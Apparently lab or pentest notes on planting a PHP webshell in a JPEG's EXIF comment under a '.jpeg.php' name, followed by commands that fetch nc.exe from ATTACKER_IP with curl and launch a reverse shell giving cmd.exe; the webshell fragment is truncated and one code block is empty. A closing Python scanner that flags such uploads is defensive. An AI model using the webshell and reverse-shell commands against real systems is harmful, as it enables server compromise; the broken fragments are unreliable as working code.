# PHP Payload in Image ExifData

* Test
```sh
exiftool -Comment="Test Payload\"; die(); ?>" test-USERNAME.jpeg.php
```
* Build Payload with AV evasion
```sh
" . shell_exec($cmd) . ""; } die(); ?>
```
* [php obfuscator](https://www.gaijin.at/en/tools/php-obfuscator)
* Obfuscated code with escaped `$`
```sh
```
* Upload and execute commands with GET parameter `?wreath=systeminfo`

## Uploading Reverse Shell through Webshell

* Parameter for Webshell
```sh
curl http://ATTACKER_IP/nc.exe -o c:\\windows\\temp\\nc-USERNAME.exe
```
* Trigger uploaded netcat
```sh
powershell.exe c:\\windows\\temp\\nc-USERNAME.exe ATTACKER_IP ATTACKER_PORT -e cmd.exe
```
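
Seen from the upload handler's side, the EXIF comment technique in the first section leaves two checkable traces: an executable extension somewhere in the file name (`.jpeg.php`) and PHP code inside a JPEG metadata segment (a comment written with `exiftool -Comment` is stored in the COM segment). The scanner below is an added example, not part of the original notes; the extension list, the marker patterns and all function names are assumptions, and the sample images are constructed inline.

```python
import struct

# Assumed list of extensions the server's PHP handler executes; match it to your config.
EXEC_EXTS = {"php", "php3", "php4", "php5", "phtml", "phar"}
# Byte patterns that have no place in image metadata.
PHP_MARKERS = (b"<?php", b"<?=", b"shell_exec(")

def executable_extensions(filename):
    """Return executable extensions found anywhere in the name, not just the last one."""
    return [p for p in filename.lower().split(".")[1:] if p in EXEC_EXTS]

def jpeg_metadata_segments(data):
    """Yield (marker, payload) for COM and APPn segments that precede the image scan."""
    if data[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG (missing SOI marker)")
    pos = 2
    while pos + 4 <= len(data) and data[pos] == 0xFF:
        marker = data[pos + 1]
        if marker in (0xDA, 0xD9):  # start of scan / end of image: no more metadata
            break
        (length,) = struct.unpack(">H", data[pos + 2:pos + 4])
        if length < 2:
            break  # malformed length field
        if marker == 0xFE or 0xE0 <= marker <= 0xEF:  # COM or APP0..APP15
            yield marker, data[pos + 4:pos + 2 + length]
        pos += 2 + length

def scan_upload(filename, data):
    """Return a list of findings; an empty list means nothing suspicious was seen."""
    findings = [f"executable extension .{e} in filename" for e in executable_extensions(filename)]
    try:
        for marker, payload in jpeg_metadata_segments(data):
            lowered = payload.lower()
            findings += [f"{m.decode()} in segment 0xFF{marker:02X}"
                         for m in PHP_MARKERS if m in lowered]
    except ValueError as exc:
        findings.append(str(exc))
    return findings

def build_jpeg(comment):
    """Constructed sample: SOI, JFIF APP0, one COM segment, EOI (no pixel data)."""
    def seg(marker, body):
        return b"\xff" + bytes([marker]) + struct.pack(">H", len(body) + 2) + body
    app0 = b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
    return b"\xff\xd8" + seg(0xE0, app0) + seg(0xFE, comment) + b"\xff\xd9"

if __name__ == "__main__":
    print(scan_upload("holiday.jpeg", build_jpeg(b"shot on holiday")))
    print(scan_upload("test-USERNAME.jpeg.php", build_jpeg(b"<?php echo 'constructed'; ?>")))
```

Pattern matching like this is a detection aid only; storing uploads under a server-generated name outside any PHP-handled path and re-encoding the image to drop metadata removes the condition the technique relies on.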